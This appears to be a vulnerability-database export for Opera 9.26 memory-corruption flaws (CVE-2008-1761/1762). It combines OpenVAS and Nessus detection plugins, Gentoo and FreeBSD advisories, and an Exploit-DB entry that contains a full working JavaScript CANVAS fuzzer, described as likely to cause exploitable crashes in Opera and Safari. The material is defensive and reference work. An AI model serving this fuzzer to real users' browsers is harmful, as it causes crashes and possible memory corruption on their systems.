from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n opera\n linux-opera\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.opera.com/support/search/view/881/\nhttp://www.opera.com/support/search/view/882/\nhttp://www.vuxml.org/freebsd/ad4a00fa-0157-11dd-8bd3-001372ae3ab9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(60839);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-1761\", \"CVE-2008-1762\");\n script_bugtraq_id(28585);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: opera\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.27.20080331\")<0) {\n txt += 'Package opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-opera\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.27.20080331\")<0) {\n txt += 'Package linux-opera version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:21", "description": "The remote host is affected by the vulnerability described in GLSA-200804-14\n(Opera: Multiple vulnerabilities)\n\n Michal Zalewski reported two vulnerabilities, memory corruption when\n adding news feed sources from a website (CVE-2008-1761) as well as when\n processing HTML CANVAS elements to use scaled images (CVE-2008-1762).\n Additionally, an unspecified weakness related to keyboard handling of\n password inputs has been reported (CVE-2008-1764).\n \nImpact :\n\n A remote attacker could entice a user to visit a specially crafted web\n site or news feed and possibly execute arbitrary code with the\n privileges of the user running Opera.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2008-04-17T00:00:00", "title": "GLSA-200804-14 : Opera: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1764", "CVE-2008-1762", "CVE-2008-1761"], "modified": "2008-04-17T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:opera", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200804-14.NASL", "href": "https://www.tenable.com/plugins/nessus/31961", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200804-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31961);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1761\", \"CVE-2008-1762\", \"CVE-2008-1764\");\n script_xref(name:\"GLSA\", value:\"200804-14\");\n\n script_name(english:\"GLSA-200804-14 : Opera: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200804-14\n(Opera: Multiple vulnerabilities)\n\n Michal Zalewski reported two vulnerabilities, memory corruption when\n adding news feed sources from a website (CVE-2008-1761) as well as when\n processing HTML CANVAS elements to use scaled images (CVE-2008-1762).\n Additionally, an unspecified weakness related to keyboard handling of\n password inputs has been reported (CVE-2008-1764).\n \nImpact :\n\n A remote attacker could entice a user to visit a specially crafted web\n site or news feed and possibly execute arbitrary code with the\n privileges of the user running Opera.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200804-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Opera users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/opera-9.27'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/opera\", unaffected:make_list(\"ge 9.27\"), vulnerable:make_list(\"lt 9.27\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Opera\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:05", "description": "Opera Software reports of multiple security issues in Opera. All of\nthem can lead to arbitrary code execution. Details are as the\nfollowing :\n\n- Newsfeed prompt can cause Opera to execute arbitrary code\n\n- Resized canvas patterns can cause Opera to execute arbitrary code", "edition": 25, "published": "2008-04-11T00:00:00", "title": "FreeBSD : opera -- multiple vulnerabilities (ad4a00fa-0157-11dd-8bd3-001372ae3ab9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1762", "CVE-2008-1761"], "modified": "2008-04-11T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-opera", "p-cpe:/a:freebsd:freebsd:opera"], "id": "FREEBSD_PKG_AD4A00FA015711DD8BD3001372AE3AB9.NASL", "href": "https://www.tenable.com/plugins/nessus/31831", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31831);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1761\", \"CVE-2008-1762\");\n script_bugtraq_id(28585);\n\n script_name(english:\"FreeBSD : opera -- multiple vulnerabilities (ad4a00fa-0157-11dd-8bd3-001372ae3ab9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Opera Software reports of multiple security issues in Opera. All of\nthem can lead to arbitrary code execution. Details are as the\nfollowing :\n\n- Newsfeed prompt can cause Opera to execute arbitrary code\n\n- Resized canvas patterns can cause Opera to execute arbitrary code\"\n );\n # http://www.opera.com/support/search/view/881/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fa0f90f\"\n );\n # http://www.opera.com/support/search/view/882/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?002512f4\"\n );\n # https://vuxml.freebsd.org/freebsd/ad4a00fa-0157-11dd-8bd3-001372ae3ab9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?604811c2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-opera\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"opera<9.27.20080331\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-opera<9.27.20080331\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:56:16", "description": "The version of Opera installed on the remote host reportedly is\naffected by several issues :\n\n - Resized canvas patterns can lead to a program crash with\n possible memory corruption.\n\n - A newsfeed prompt can cause Opera to execute arbitrary \n code.\n\n - Improved keyboard handling of password inputs.", "edition": 25, "published": "2008-04-03T00:00:00", "title": "Opera < 9.27 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1762", "CVE-2008-1761"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:opera:opera_browser"], "id": "OPERA_927.NASL", "href": "https://www.tenable.com/plugins/nessus/31734", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31734);\n script_version(\"1.12\");\n\n script_cve_id(\"CVE-2008-1761\", \"CVE-2008-1762\");\n script_bugtraq_id(28585);\n script_xref(name:\"Secunia\", value:\"29662\");\n\n script_name(english:\"Opera < 9.27 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version number of Opera\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web browser that is affected by several\nissues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Opera installed on the remote host reportedly is\naffected by several issues :\n\n - Resized canvas patterns can lead to a program crash with\n possible memory corruption.\n\n - A newsfeed prompt can cause Opera to execute arbitrary \n code.\n\n - Improved keyboard handling of password inputs.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.opera.com/support/search/view/881/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.opera.com/support/search/view/882/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://web.archive.org/web/20170829061749/http://www.opera.com/docs/changelogs/windows/927/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Opera version 9.27 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/04/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:opera:opera_browser\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"opera_installed.nasl\");\n script_require_keys(\"SMB/Opera/Version_UI\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nversion_ui = get_kb_item(\"SMB/Opera/Version_UI\");\nif (isnull(version_ui)) exit(0);\n\nif (version_ui =~ \"^([0-8]\\.|9\\.([01][0-9]|2[0-6])($|[^0-9]))\")\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n \"Opera version \", version_ui, \" is currently installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-1764", "CVE-2008-1762", "CVE-2008-1761"], "description": "Multiple memory corruptions, keyboard passwords handling weakness.", "edition": 1, "modified": "2008-04-15T00:00:00", "published": "2008-04-15T00:00:00", "id": "SECURITYVULNS:VULN:8908", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8908", "title": "Opera browser multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1764", "CVE-2008-1762", "CVE-2008-1761"], "description": "### Background\n\nOpera is a fast web browser that is available free of charge. \n\n### Description\n\nMichal Zalewski reported two vulnerabilities, memory corruption when adding news feed sources from a website (CVE-2008-1761) as well as when processing HTML CANVAS elements to use scaled images (CVE-2008-1762). Additionally, an unspecified weakness related to keyboard handling of password inputs has been reported (CVE-2008-1764). \n\n### Impact\n\nA remote attacker could entice a user to visit a specially crafted web site or news feed and possibly execute arbitrary code with the privileges of the user running Opera. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Opera users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-client/opera-9.27\"", "edition": 1, "modified": "2008-04-14T00:00:00", "published": "2008-04-14T00:00:00", "id": "GLSA-200804-14", "href": "https://security.gentoo.org/glsa/200804-14", "type": "gentoo", "title": "Opera: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1762", "CVE-2008-1761"], "description": "\nOpera Software reports of multiple security issues in Opera.\n\t All of them can lead to arbitrary code execution. Details are\n\t as the following:\n\nNewsfeed\n\t prompt can cause Opera to execute arbitrary code\nResized\n\t canvas patterns can cause Opera to execute arbitrary code\n\n", "edition": 4, "modified": "2010-05-12T00:00:00", "published": "2008-04-03T00:00:00", "id": "AD4A00FA-0157-11DD-8BD3-001372AE3AB9", "href": "https://vuxml.freebsd.org/freebsd/ad4a00fa-0157-11dd-8bd3-001372ae3ab9.html", "title": "opera -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T15:02:10", "description": "Opera Web Browser 9.26 Multiple Security Vulnerabilities. CVE-2008-1762. Dos exploit for linux platform", "published": "2008-04-03T00:00:00", "type": "exploitdb", "title": "Opera Web Browser 9.26 - Multiple Security Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1762"], "modified": "2008-04-03T00:00:00", "id": "EDB-ID:31594", "href": "https://www.exploit-db.com/exploits/31594/", "sourceData": "source: http://www.securityfocus.com/bid/28585/info\r\n\r\nOpera Web Browser is prone to multiple security vulnerabilities that may allow remote attackers to execute code.\r\n\r\nThese issues lead to memory corruption and may result in remote unauthorized access and denial-of-service attacks.\r\n\r\nVersions prior to Opera 9.27 are vulnerable.\r\n\r\n<body> <font face=\"arial,helvetica\"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href=\"mailto:lcamtuf@coredump.cx\">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style=\"border: 1px solid teal\"></canvas> </div> <img id=image src=\"envelope.gif\" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value=\"Begin tests\" id=button onclick=\"setup_all()\"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return \"#C0F0A0\"; else return \"#000090\"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,\"repeat\"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31594/"}]}